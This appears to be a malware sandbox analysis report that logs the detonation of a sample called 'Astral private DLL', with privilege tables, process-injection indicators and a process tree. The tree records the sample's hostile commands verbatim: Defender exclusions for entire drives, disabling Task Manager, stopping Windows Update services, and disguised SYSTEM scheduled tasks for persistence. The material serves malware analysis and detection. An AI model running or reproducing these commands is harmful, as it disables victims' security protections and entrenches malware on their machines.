Token: SeRestorePrivilege	3744	powershell.exe
Token: SeShutdownPrivilege	3744	powershell.exe
Token: SeDebugPrivilege	3744	powershell.exe
Token: SeSystemEnvironmentPrivilege	3744	powershell.exe
Token: SeRemoteShutdownPrivilege	3744	powershell.exe
Token: SeUndockPrivilege	3744	powershell.exe
Token: SeManageVolumePrivilege	3744	powershell.exe
Token: 33	3744	powershell.exe
Token: 34	3744	powershell.exe
Token: 35	3744	powershell.exe
Token: 36	3744	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	2276	svchost.exe
Token: SeIncreaseQuotaPrivilege	2276	svchost.exe
Token: SeSecurityPrivilege	2276	svchost.exe
Token: SeTakeOwnershipPrivilege	2276	svchost.exe
Token: SeLoadDriverPrivilege	2276	svchost.exe
Token: SeSystemtimePrivilege	2276	svchost.exe
Token: SeBackupPrivilege	2276	svchost.exe
Token: SeRestorePrivilege	2276	svchost.exe
Token: SeShutdownPrivilege	2276	svchost.exe
Token: SeSystemEnvironmentPrivilege	2276	svchost.exe
Token: SeUndockPrivilege	2276	svchost.exe
Token: SeManageVolumePrivilege	2276	svchost.exe

Suspicious use of UnmapMainImage 2 IoCs

pid	Process
2748	svchost.exe
2748	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1088 wrote to memory of 3804	1088	AstralprivateDLL.exe.bin.exe	83
PID 1088 wrote to memory of 3804	1088	AstralprivateDLL.exe.bin.exe	83
PID 1088 wrote to memory of 3804	1088	AstralprivateDLL.exe.bin.exe	83
PID 1088 wrote to memory of 2120	1088	AstralprivateDLL.exe.bin.exe	84
PID 1088 wrote to memory of 2120	1088	AstralprivateDLL.exe.bin.exe	84
PID 3804 wrote to memory of 4416	3804	Astral private DLL.exe	85
PID 3804 wrote to memory of 4416	3804	Astral private DLL.exe	85
PID 3804 wrote to memory of 4416	3804	Astral private DLL.exe	85
PID 4416 wrote to memory of 2548	4416	WScript.exe	86
PID 4416 wrote to memory of 2548	4416	WScript.exe	86
PID 4416 wrote to memory of 2548	4416	WScript.exe	86
PID 2548 wrote to memory of 3992	2548	cmd.exe	88
PID 2548 wrote to memory of 3992	2548	cmd.exe	88
PID 2548 wrote to memory of 3992	2548	cmd.exe	88
PID 2548 wrote to memory of 4812	2548	cmd.exe	89
PID 2548 wrote to memory of 4812	2548	cmd.exe	89
PID 4812 wrote to memory of 1496	4812	ServerComponenthostMonitorDll.exe	97
PID 4812 wrote to memory of 1496	4812	ServerComponenthostMonitorDll.exe	97
PID 1496 wrote to memory of 4736	1496	csc.exe	99
PID 1496 wrote to memory of 4736	1496	csc.exe	99
PID 4812 wrote to memory of 3300	4812	ServerComponenthostMonitorDll.exe	118
PID 4812 wrote to memory of 3300	4812	ServerComponenthostMonitorDll.exe	118
PID 4812 wrote to memory of 2400	4812	ServerComponenthostMonitorDll.exe	119
PID 4812 wrote to memory of 2400	4812	ServerComponenthostMonitorDll.exe	119
PID 4812 wrote to memory of 3044	4812	ServerComponenthostMonitorDll.exe	120
PID 4812 wrote to memory of 3044	4812	ServerComponenthostMonitorDll.exe	120
PID 4812 wrote to memory of 4620	4812	ServerComponenthostMonitorDll.exe	121
PID 4812 wrote to memory of 4620	4812	ServerComponenthostMonitorDll.exe	121
PID 4812 wrote to memory of 4892	4812	ServerComponenthostMonitorDll.exe	122
PID 4812 wrote to memory of 4892	4812	ServerComponenthostMonitorDll.exe	122
PID 4812 wrote to memory of 2108	4812	ServerComponenthostMonitorDll.exe	123
PID 4812 wrote to memory of 2108	4812	ServerComponenthostMonitorDll.exe	123
PID 4812 wrote to memory of 3304	4812	ServerComponenthostMonitorDll.exe	124
PID 4812 wrote to memory of 3304	4812	ServerComponenthostMonitorDll.exe	124
PID 4812 wrote to memory of 3744	4812	ServerComponenthostMonitorDll.exe	125
PID 4812 wrote to memory of 3744	4812	ServerComponenthostMonitorDll.exe	125
PID 4812 wrote to memory of 2132	4812	ServerComponenthostMonitorDll.exe	126
PID 4812 wrote to memory of 2132	4812	ServerComponenthostMonitorDll.exe	126
PID 4812 wrote to memory of 4128	4812	ServerComponenthostMonitorDll.exe	127
PID 4812 wrote to memory of 4128	4812	ServerComponenthostMonitorDll.exe	127
PID 4812 wrote to memory of 3916	4812	ServerComponenthostMonitorDll.exe	128
PID 4812 wrote to memory of 3916	4812	ServerComponenthostMonitorDll.exe	128
PID 4812 wrote to memory of 2288	4812	ServerComponenthostMonitorDll.exe	129
PID 4812 wrote to memory of 2288	4812	ServerComponenthostMonitorDll.exe	129
PID 4812 wrote to memory of 4344	4812	ServerComponenthostMonitorDll.exe	130
PID 4812 wrote to memory of 4344	4812	ServerComponenthostMonitorDll.exe	130
PID 4812 wrote to memory of 1444	4812	ServerComponenthostMonitorDll.exe	131
PID 4812 wrote to memory of 1444	4812	ServerComponenthostMonitorDll.exe	131
PID 4812 wrote to memory of 2404	4812	ServerComponenthostMonitorDll.exe	132
PID 4812 wrote to memory of 2404	4812	ServerComponenthostMonitorDll.exe	132
PID 4812 wrote to memory of 3136	4812	ServerComponenthostMonitorDll.exe	133
PID 4812 wrote to memory of 3136	4812	ServerComponenthostMonitorDll.exe	133
PID 4812 wrote to memory of 4256	4812	ServerComponenthostMonitorDll.exe	134
PID 4812 wrote to memory of 4256	4812	ServerComponenthostMonitorDll.exe	134
PID 4812 wrote to memory of 400	4812	ServerComponenthostMonitorDll.exe	135
PID 4812 wrote to memory of 400	4812	ServerComponenthostMonitorDll.exe	135
PID 4812 wrote to memory of 4800	4812	ServerComponenthostMonitorDll.exe	153
PID 4812 wrote to memory of 4800	4812	ServerComponenthostMonitorDll.exe	153
PID 4800 wrote to memory of 5608	4800	cmd.exe	156
PID 4800 wrote to memory of 5608	4800	cmd.exe	156
PID 4800 wrote to memory of 6024	4800	cmd.exe	157
PID 4800 wrote to memory of 6024	4800	cmd.exe	157
PID 4800 wrote to memory of 5512	4800	cmd.exe	164
PID 4800 wrote to memory of 5512	4800	cmd.exe	164

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:612
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:336

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:948

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:392

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:868

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1092

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1108

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1152

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1216
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:3056
- C:\Program Files\Google\Chrome\updater.exe
  "C:\Program Files\Google\Chrome\updater.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Drops file in Program Files directory
  PID:2620

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1292

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1300

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1368

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1408

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1452
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2664

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1556

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1564

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1600

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1720

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1752

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1764

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1836

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1888

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1900

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1972

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1996

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1436

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2092

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2228

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2276

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2436

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2444

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2680

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Suspicious use of UnmapMainImage
PID:2748

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2804

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2816

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2840

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2848

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2304

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:1100

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3312

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3376
- C:\Users\Admin\AppData\Local\Temp\AstralprivateDLL.exe.bin.exe
  "C:\Users\Admin\AppData\Local\Temp\AstralprivateDLL.exe.bin.exe"
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1088
- - C:\Users\Admin\AppData\Local\Temp\Astral private DLL.exe
    "C:\Users\Admin\AppData\Local\Temp\Astral private DLL.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:3804
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\containerperf\mtmIdTw4RygS3trJMnWvLFqF6dzRpLwhZvwqEPqaKDGsnR5lufKuCs3iyL.vbe"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4416
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\containerperf\OHYKCXOXzFm1PCyBPS6uXfmto4OWxv9XE4FGIVj.bat" "
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2548
      - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        6⤵
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:3992
      - C:\containerperf\ServerComponenthostMonitorDll.exe
        
        "C:\containerperf/ServerComponenthostMonitorDll.exe"
        6⤵
        Modifies WinLogon for persistence
        Checks computer location settings
        Executes dropped EXE
        Adds Run key to start application
        Drops file in Program Files directory
        Drops file in Windows directory
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4812
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xlhj3knb\xlhj3knb.cmdline"
        7⤵
        Drops file in System32 directory
        Suspicious use of WriteProcessMemory
        
        PID:1496
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCBBC.tmp" "c:\Windows\System32\CSCA0CA6B898C874F42BB2ED23AC8118C1F.TMP"
        8⤵
        
        PID:4736
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:3300
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2400
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/containerperf/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:3044
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:4620
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:4892
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2108
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:3304
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:3744
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2132
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:4128
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:3916
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2288
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Mozilla Firefox\fontdrvhost.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:4344
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\dotnet\winlogon.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1444
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Desktop\sihost.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2404
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Portable Devices\dwm.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:3136
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\schemas\Provisioning\explorer.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:4256
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\containerperf\ServerComponenthostMonitorDll.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:400
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\zVf9N2m7nr.bat"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:4800
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        8⤵
        
        PID:5608
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        8⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6024
        
        C:\containerperf\ServerComponenthostMonitorDll.exe
        
        "C:\containerperf\ServerComponenthostMonitorDll.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5512
- - C:\Users\Admin\AppData\Local\Temp\twain_32.exe
    "C:\Users\Admin\AppData\Local\Temp\twain_32.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Drops file in Program Files directory
    PID:2120
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:4276
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:5704
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:4204
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:972
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:5736
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:5828
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:1080
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:3256
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5744
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2868
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:4916
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:3796
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:5200
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5956
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#amvyyojjq#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:3744
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:244
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:2352
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2944
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:5444
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5804
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:1588
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5144
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1924
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:5524
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:3136
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:2136
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:5280
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:5240
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4944
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    PID:5264
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    PID:2152
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    PID:5416
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    PID:1580
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:5164
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#amvyyojjq#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:5496
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5356
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:1684
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  - Modifies data under HKEY_USERS
  PID:2708

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3580

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3772

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3932

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:2988

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:3680

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:4464

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:428

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:4772

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:2172

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:3948

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3560

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3500

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:2672

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3888

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 14 /tr "'C:\Program Files\Mozilla Firefox\fontdrvhost.exe'" /f
1⤵
